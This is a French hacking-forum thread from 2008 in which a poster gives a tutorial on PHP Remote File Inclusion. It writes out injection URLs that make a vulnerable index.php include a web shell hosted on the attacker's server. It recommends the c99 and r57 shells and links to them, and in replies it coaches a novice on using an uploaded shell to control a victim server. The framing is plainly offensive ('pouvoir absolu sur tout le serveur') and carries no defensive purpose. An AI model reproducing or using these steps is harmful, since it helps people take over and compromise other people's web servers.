|
|||||||
| S'inscrire | FAQ | Top Statistics | Membres | Calendrier | Recherche | Messages du jour | Marquer les forums comme lus |
| securite Site Web PHP Remote File Inclusion ,telechargement VNC ,protection via Google ,shell c99 r57,hack site web,vulnerabilites,injection sql,buffer overflow,xss |
 |
|
|
LinkBack | Outils de la discussion |
Note: 
|
Modes d'affichage |
24/01/2008, 19h06
|
|||
|
|||
Bonjour,
On entend beaucoup parler du RFI, le remote file inclusion, cette vulnérabilité permet au pirate d'inclure un shell PHP, et de controler le serveur infecté. Cette attaque repose sur un principe très basique : Dans le site infecté, il y a une page principale nommée index.php, et pour ne pas refaire le code essentiel a chaque fois, le webmaster ne fait qu'inclure une page au milieux de cette page index, comme suit :  (désolé pour l'image made in MSPaint ) on voit que la page index.php (fond bleu) inclus la page page.php (fond jaune). le nom de la page à inclure est passé en paramètre dans l'url (méthode GET pour les connaisseurs PHP), par exemple : h**p://www.victim.com/index.php?page=page on voit bien que la page index.php doit contenir la page page.php (le code de la page index.php interprète automatiquement le code de la page incluse en PHP). Comme je l'ai deja mentionné, notre but est d'inclure une page externe (hebérgée sur notre propre serveur) dans la page vulnérable, ce qui pourrait donner : h**p://www.victim.com/index.php?page=http://www.monsite.com/shell.txt? Dans cet exemple, on inclus la page h**p://www.monsite.com/shell.txt dans la page infectée index.php. Remarque : h**p://www.monsite.com/shell.txt est hébérgé sur notre propre serveur, et en extention .txt et pas en .php pour ne pas qu'il s'éxecute sur notre serveur. Quand on parvient a inclure le shell dans la page vulnérable, on a tout fait, il ne reste que savourer le pouvoir absolu sur tout le serveur qui hébérge le site. dans les fichiers attachés vous trouverez deux des meilleurs shells PHP, le r57 et le c99. Ce tuto sera enrichi par des images et des exemples bientot, Ciao, a bientot, Satsujin     
|
| Sponsored Links |
| Sponsored Links |
Recherche personnalisée
|
|
25/01/2008, 11h42
|
|||
|
|||
|
Citation:
|
|
06/02/2008, 22h08
|
|||
|
|||
|
c'est vraiment interessant, j'ai utilisé le php que pour la creation des application web, j'ai j'amais eu le temps l'utiliser contre les failles
|
|
07/02/2008, 01h11
|
|||
|
|||
|
Citation:
|
|
11/04/2008, 09h34
|
|||
|
|||
|
Victime
bjr tts le monde
apres uploadé le shell C99 Cmnt faire pr se connecté vers le serveur victime? avec le browser ??? et esk on laisse l'extension du c99.txt ou bien en doit la changer ? si il il faut la changer cmnt faire ? je pose tres de kestion loool Merci d'avance 
|
|
12/04/2008, 16h09
|
|||
|
|||
|
Citation:
Après avoir uploadé le shell sur ton propre serveur en format .txt, tu cherche une faille include et tu l'inclus dans la page victime( par ex.: victim.com/page.php?page=http://monserveur.com/monshell.txt? ), après, il sera interprété dans la page victime comme du php et tu pourras l'utiliser sans changer d'extension. Mais ne l'upload jamais sur ton serveur en PHP, car il pourra etre utilisé contre ton serveur. C'est bien de poser bcp de questions, si t'en a d'autres on est la. A+ Satsujin
|
|
12/04/2008, 16h17
|
|||
|
|||
|
Citation:
pour télécharger le shell r57, allez vous ne pouvez pas voir le lien [ enregistrez vous ici]]] pour le C99, c'est vous ne pouvez pas voir le lien [ enregistrez vous ici]]] et copiez tout le contenu et enregistrer dans un fichier .txt, ou si vous ne voulez pas l'enregistrer, incluez le depuis la meme adresse, sa marcheras.
|
|
| Tags |
| Aucune |
| Outils de la discussion | |
| Modes d'affichage | Noter la discussion |
|
|
ucef
Mode linéaire
